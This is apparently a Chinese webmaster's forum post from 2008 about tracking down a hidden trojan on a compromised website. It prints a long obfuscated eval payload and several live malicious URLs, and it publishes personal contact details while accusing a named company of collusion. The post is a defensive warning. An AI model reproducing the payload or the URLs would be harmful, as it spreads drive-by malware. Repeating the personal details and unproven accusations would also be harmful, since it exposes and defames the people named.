有一个站被挂马很长时间了,前台页面的马被清掉,但后台的马一直找不到,实在不舒服,准备将这个站自杀掉,但又不甘心,决定再找一次。
花了四个多小时,终于找到了,现贴出来提醒大家注意,大家一定不要点马所在的网址,除非你安装了杀毒软件,光一个360是不行的。
先看这一段代码:
注意其中的'http://www.w3og.cn/org',这是木马网页地址。很有欺骗性,我找过很多次都没注意到。服务器好象是四川乐山电信的,我几乎要拿我自己的服务器与之同归于荆
再强调一下,贴出来不是要害你啊,不要乱点。
Domain Name: w3og.cn
ROID: 20080213s10001s70391079-cn
Domain Status: ok
Registrant Organization: 陈强
Registrant Name: 陈强
Administrative Email: zhuya22@126.com
Sponsoring Registrar: 北京新网数码信息技术有限公司
Name Server:ns2.xinnet.cn
Name Server:ns2.xinnetdns.com
Registration Date: 2008-02-13 17:16
Expiration Date: 2011-02-13 17:16
http://www.zjedu.gov.cn/TzemailA ... 277010f71e2c65c0027
电子邮件: zhuya22@126.com
联系电话: 0577658796549
联系地址: 电风扇士大夫
提交时间: 2006-12-11
主题: 这样的设施也能办大学???
建议内容: 温职院INTERNET网硬件设施太差 每栋宿舍楼网速一直以来比拨号
上网还慢 ,根本不能满足大学生对TNTER网的需求
交了30元/月的网费却只能上垃圾网络,收了我们的血汗钱却不干人事,气人兮
气人,
学校机房既小又差,还1。5元/小时,我靠 这也叫大学吗??我们学剩
上网只能跑正上的网吧,远又网费又贵,很多同学为了省钱只能玩通宵
温职院的网络设施根本不行,不知道评估团怎么办事的
可笑的是学校还想评全国十大优秀高职 丢死人了
请注意这个公司长沙智之星软件有限公司www.zzstar.cn,这个木马一直为这个站带流量,如果是被陷害的,那还情有可原。如果是同挂马者合作的话,严重鄙视。总经理:廖某某(不贴名字了)
公 司 地 址: 长沙市麓山南路343号(矿山研究院内)902室
联 系 电 话: 0731-2173510 (0)13787116266
邮 政 编 码: 410012
电 子 邮 箱: zzstar888@126.com zzstar168@163.com
公 司 网 址:www.zzstar.cn www.macrorise.com
业务联系QQ:7428377 165635301
另一个受害者的文章:今天学生处的人说他们网页打开就提示有病毒。上去看了一下,果然,打开之后ie有打开其他网页的动作,浏览器很卡,然后跳出一个RealPlayer的窗口,Nod32提示
2008-4-18 16:21:09 HTTP 过滤器 文件 http://user1.33216.net/bak.css Win32/TrojanDownloader.Small.OBJ 特洛伊木马 连接中断 - 已隔离 NICAdministrator 通过应用程序访问 web 时检测到威胁: C:Program FilesMaxthon2Maxthon.exe.
于是开始检查。
费了一番功夫,就不多说了,直接进入主题。
打开Ethereal,对tcp 80端口进行监测,打开Firefox,并清除缓存(如果不清除可能造成不能完全打开)。
完全打开页面后,关闭监测。进行查看。
按照理论来说,应该只有本机与服务器之间的通信,哪么其他IP地址的通信就很可以了。
果然,看到了61.174.63.178这个IP(www.w3og.cn/org),使用Ethereal可以看到具体的URL。
使用FF打开这个网页。
页面是空白的,查看源代码内容如下:
www.w3og.cn/org/
document.write("
")顺藤摸瓜:
其中
www.zzstar.cb/reg/w30.htm
是51yes的一个统计。
http://abc1.315666.net/s22.html
第二个页面也是统计,第一个页面就是病毒了。
再次使用FF打开,查看源代码:
window.defaultStatus="完成";
eval("1641621711731661411624014573151216614116240141144157755014415714316515514515616456143162145141164145105154145155145156164504215714215214514316442515173151216614116240153141166754213417064142134170667113417066145134170666713417067631341706614613417066661341706764427315121411441575616314516410116416416215114216516414550421431541411631631511444254421431541631511447210210471661036565665566651016355616110460557170631015560601036064106103627110563664251731512166141162401531411667542134170641421341706671134170661451341706667134170676313417066146134170666613417067644273151216614116240141163751411441575614316214514116414515714215214514316450421011441571441425612316416214514115542544242511751512143141164143150501455117317573151214615115614115415417117315121511465014541754213315714215214514316440105162162157162135425117315121441571431651551451561645616716215116414550427416314316215116016440163162143751501641641607213457134571651631451626156636362616656156145164134571551636066606164561521637674134571631431621511601647642511751512145154163145173151216416217117340166141162401467315121661411624016415016515614414516275156145167401011431641511661451301171421521451431645042104120103154151145156164561261571444251731751512143141164143150501465117317573151214615115614115415417117340151146501464175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016715114416415075616060401501451511471501647560401631621437515016416416072575716516314516261566363626166561561451645712415016515614414516256150164155154767457151146162141155145764751175175151216416217117316614116240147731512166141162401471541671571621541447515614516740101143164151166145130117142152145143164504210711410311010112456107114103150141164103164162154566142517317515121431411641431505014751173175731512146151156141154154171173151146501474175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626156636362616656156145164571071141271171221141045615016415515442767457151146162141155145764751175175151216416217117316614116240150731512166141162401631641571621557515614516740101143164151166145130117142152145143164504211512012356123164157162155120154141171145162566142517317515121431411641431505015051173175731512146151156141154154171173151146501504175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626156636362616656156145164571231641571621551111115615016415515442767457151146162141155145764751175175151216416217117316614116240151731512166141162401621451411547515614516740101143164151166145130117142152145143164504211110512212010316415456111105122120103164154566142517317515121431411641431505015151173175731512146151156141154154171173151146501514175421331571421521451431644010516216215716213542511731512144157143165155145156164561671621511641455047741511461621411551454016316417115414575144151163160154141171721561571561454016316214375421501641641607257571651631451626156636362616656156145164571221451411545615016415515442767457151146162141155145764751151214415714316515514515616456167162151164145504774163103162111160124401141011561071651011471057542152101166101163103162111160124424016316214375150164164160721345713457165163145162615663636261665615614516413457162145141154561521637674134571631431621511601647647511751751512164162171173166141162401527315121661411624010214115114416575156145167401011431641511661451301171421521451431645042102141151144165102141162561241571571544251731751512143141164143150501525117317573151214615115614115415417117315114650152417542133157142152145143164401051621621571621354251173151210214115114416513342134170646413417066143134170661461341706661134170666413417064641341706563421355042150164164160725757165163145162615663636261665615614516457102141151144165561431411424254404213417064621341706661134170667113417066641341706765134170621451341706665134170677013417066654254406051175175151215114650146757542133157142152145143164401051621621571621354240464640147757542133157142152145143164401051621621571621354240464640150757542133157142152145143164401051621621571621354240464640151757542133157142152145143164401051621621571621354240464640152757542133157142152145143164401051621621571621354251151217315415714314116415115715656162145160154141143145504214114215716516472142154141156153425173175175175")
/*Extreme*/
很显然,这个就是病毒源代码了。加密了而且,不管他了。
另外注意到,
http://www.51.la/report/0_help.asp?id=1793783&err=4&help=2
可以看到统计名称。不就是为了一点流量,做这些犯罪的事情,何必呢?
1、使用FF Ethereal。FF不会被这些漏洞利用,而IE基本是一打开就死了。
2、上传的漏洞位于xgcAD2008041.js,应该是用的动易的漏洞上传的。
3、搜索w3og.cn,基本搜索到的网页,google都会提示是恶意网站...
拥有这个W3og.cn的人的注册信息:
Domain Name: w3og.cn ROID: 20080213s10001s70391079-cn Domain Status: ok Registrant Organization: 陈强 Registrant Name: 陈强 Administrative Email: zhuya22@126.com Sponsoring Registrar: 北京新网数码信息技术有限公司 Name Server:ns2.xinnet.cn Name Server:ns2.xinnetdns.com Registration Date: 2008-02-13 17:16 Expiration Date: 2011-02-13 17:16
这个w3og.cn和zzstar(一家建站公司)显然是有关系的,要不然也不会再木马里面挂上zzstar的流量统计...